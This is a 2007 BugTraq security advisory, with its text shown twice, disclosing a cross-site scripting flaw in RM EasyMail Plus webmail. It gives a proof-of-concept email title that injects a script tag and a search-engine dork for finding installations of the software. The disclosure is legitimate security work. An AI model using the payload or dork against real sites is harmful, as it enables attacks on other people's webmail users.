BugTraq
Back to list
|
Post reply
RedLevel Advisory #018 - RM EasyMail Plus - Cross-Site Scripting Vulnerability #2
May 20 2007 01:22AM
john martinelli com
RM EasyMail Plus - Cross-Site Scripting Vulnerability #2
This cross-site scripting vulnerability can be exploited if a client views an email with a specially crafted title.
Vulnerable E-Mail Title: </title><script>alert(1)</script>
Vulnerable: RM EasyMail Plus
Google d0rk: intitle:"Powered by RM EasyMail Plus"
John Martinelli
john (at) martinelli (dot) com [email concealed]
RedLevel Security
RedLevel.org
May 19th, 2007
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
This cross-site scripting vulnerability can be exploited if a client views an email with a specially crafted title.
Vulnerable E-Mail Title: </title><script>alert(1)</script>
Vulnerable: RM EasyMail Plus
Google d0rk: intitle:"Powered by RM EasyMail Plus"
John Martinelli
john (at) martinelli (dot) com [email concealed]
RedLevel Security
RedLevel.org
May 19th, 2007
[ reply ]